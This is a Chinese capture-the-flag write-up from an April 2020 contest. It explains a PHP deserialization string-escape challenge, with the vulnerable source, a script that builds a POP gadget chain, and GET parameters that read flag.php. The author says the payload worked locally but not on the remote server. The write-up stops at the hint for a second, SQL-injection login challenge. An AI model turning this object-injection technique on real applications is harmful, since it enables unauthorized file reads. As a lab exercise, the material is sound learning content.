
安恒月赛20200425

source link: https://sunny250.github.io/2020/04/25/%E5%AE%89%E6%81%92%E6%9C%88%E8%B5%9B20200425/

Ezunserialize

打开题目即显示源码（index.php 通过 show_source("index.php") 把自身打印出来）：

 <?php
// The challenge prints its own source, so the vulnerable code below is visible to the player.
show_source("index.php");
/**
 * Applied before the serialized data is stored: rewrites the 3-byte sequence
 * NUL '*' NUL (the marker PHP's serializer emits in front of protected property
 * names) as the six literal characters \0\0\0.
 *
 * NOTE(review): '\0\0\0' is single-quoted, so it is six ASCII bytes
 * (backslash, zero, backslash, zero, backslash, zero), not three NUL bytes.
 * Every match therefore grows the data by 3 bytes while the s:N: length
 * prefixes that serialize() already wrote stay as they were.
 */
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

/**
 * Inverse of write(): turns every literal \0\0\0 back into NUL '*' NUL.
 *
 * NOTE(review): this is where the bug lives. The replacement runs over the
 * whole serialized blob, so a literal \0\0\0 that the user placed inside a
 * property value (never touched by write(), because it contains no NUL bytes)
 * is also shrunk from 6 bytes to 3. The s:N: length prefix still carries the
 * old length, so unserialize() keeps reading past the real end of that string
 * and parses the attacker's following bytes as new serialized data - the
 * "string escape" this challenge is built around.
 */
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}

/**
 * Plain data holder. Both properties are filled straight from $_GET at the
 * bottom of the file, so their contents are fully attacker-controlled.
 */
class A{
public $username;
public $password;
function __construct($a, $b){
$this->username = $a;
$this->password = $b;
}
}

/**
 * Gadget entry point. __destruct() runs automatically when the object is
 * released (e.g. after unserialize() returns it), and the concatenation
 * 'a'.$this->b forces $this->b to string - if $this->b is an object with a
 * __toString() method, that method gets invoked. The default 'gqy' is harmless.
 */
class B{
public $b = 'gqy';
function __destruct(){
$c = 'a'.$this->b;
echo $c;
}
}

/**
 * Gadget sink. __toString() reads and echoes whatever path is stored in $c.
 * Reached through B::__destruct(), this is an arbitrary file read with an
 * attacker-chosen path; the comment inside names the intended target.
 */
class C{
public $c;
function __toString(){
//flag.php
echo file_get_contents($this->c);
return 'nice';
}
}

// Untrusted input: both constructor arguments come directly from the query string.
$a = new A($_GET['a'],$_GET['b']);
// The step that stores the serialized data is omitted; below it is read back and unserialized.
// SECURITY: unserialize() on data derived from user input. serialize() fixes the s:N:
// length prefixes first, then read() can shorten a value containing a literal \0\0\0,
// so the attacker controls the structure being deserialized and can reach
// B::__destruct() -> C::__toString() -> file_get_contents(). Data like this should be
// round-tripped with json_encode()/json_decode() (or a length-preserving encoding),
// never unserialize().
$b = unserialize(read(write(serialize($a))));

看到对序列化数据做长度不对称的替换（write() 把 3 字节的 `\0*\0` 换成 6 个字符的 `\0\0\0`，read() 再换回 3 字节），就想到反序列化字符串逃逸：`s:N:` 长度前缀在替换前已经由 serialize() 写死，替换后字符串变短，unserialize 会继续向后读取，把我们控制的后续字节当成新的序列化结构来解析。

A 类的 username、password 直接来自 $_GET，完全可控；而 unserialize 的输入正是 serialize($a) 依次经过 write()、read() 之后的结果。

<?php
/**
 * Outer object of the payload. Declaration order (username, then password) is
 * what serialize() emits and what the escape depends on, so it is kept as is.
 * username holds the literal two characters backslash-zero (single-quoted).
 */
class A{
public $username = '\0';
public $password;
function __construct(){
$this->password = new B();
}
}

/**
 * Middle link of the chain. On the target, B::__destruct() concatenates $b,
 * which triggers C::__toString(); here only the serialized shape matters,
 * so b is simply a C instance.
 */
class B{
public $b;
function __construct(){
$this->b = new C();
}
}

/**
 * Innermost gadget. On the target, C::__toString() does file_get_contents($c),
 * so c is the file to read. A property default produces exactly the same
 * serialized form as assigning it in a constructor.
 */
class C{
public $c = "flag.php";
}

// Print the generated chain; the password part of this output is what goes into the b parameter.
// Expected output: O:1:"A":2:{s:8:"username";s:2:"\0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}
echo serialize(new A());

数据先经过 write() 再经过 read()：用户输入里每出现一个 `\0\0\0`（6 个字符，write() 不会碰它，因为其中没有 NUL 字节）都会被 read() 换成 3 字节的 `\0*\0`，长度减少 3，但 serialize() 写入的 `s:N:` 长度前缀不变。正常情况下序列化后的字符串是

/**
 * (Repeated from the challenge source.) Replaces NUL '*' NUL with the six
 * literal characters \0\0\0 - the single-quoted string is ASCII, not NUL
 * bytes, so each match adds 3 bytes after the s:N: prefixes are already fixed.
 */
function write($data) {
return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data);
}

/**
 * (Repeated from the challenge source.) Shrinks every literal \0\0\0 - including
 * ones the user put into a property value - from 6 bytes to 3, while the s:N:
 * prefix keeps the old length. This is the asymmetry the escape below exploits.
 */
function read($data) {
return str_replace('\0\0\0', chr(0) . '*' . chr(0), $data);
}
O:1:"A":2:{s:8:"username";s:4:"test";s:8:"password";s:4:"tese";}

要让 password 被反序列化成对象，就得利用 username 缩短后多出来的长度把原本的字符串类型"吃掉"：username 声明长度 48，而 8 个 `\0\0\0` 经 read() 后只剩 24 字节，unserialize 会继续吃掉后面 24 个字符 `";s:8:"password";s:74:"0`，正好到 b 中开头的 `0` 为止；随后 b 里的 `"` 闭合该字符串，我们注入的 `s:8:"password";O:1:"B":…` 就成为真正被解析的 password。

O:1:"A":2:{s:8:"username";s:48:"********";s:8:"password";s:74:"0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}";}
a=\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 (8个\0\0\0). b=0";s:8:"password";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:8:"flag.php";}}}

本地测试通过了，但是远程没打通。可能的原因（未验证）：通过 GET 传参时 `"`、`;`、`{`、`}` 等字符需要做 URL 编码，或者题目注释里被省略的"存储序列化数据"环节与本地复现环境不一致。

babytricks

打开题目是一个登录框，查看页面源码发现如下提示（注意 `$user` 被直接拼进 SQL 语句，passwd 则经 `%s` 格式化，注入点很可能在 user 字段）：

tips:select * from user where user='$user' and passwd='%s'
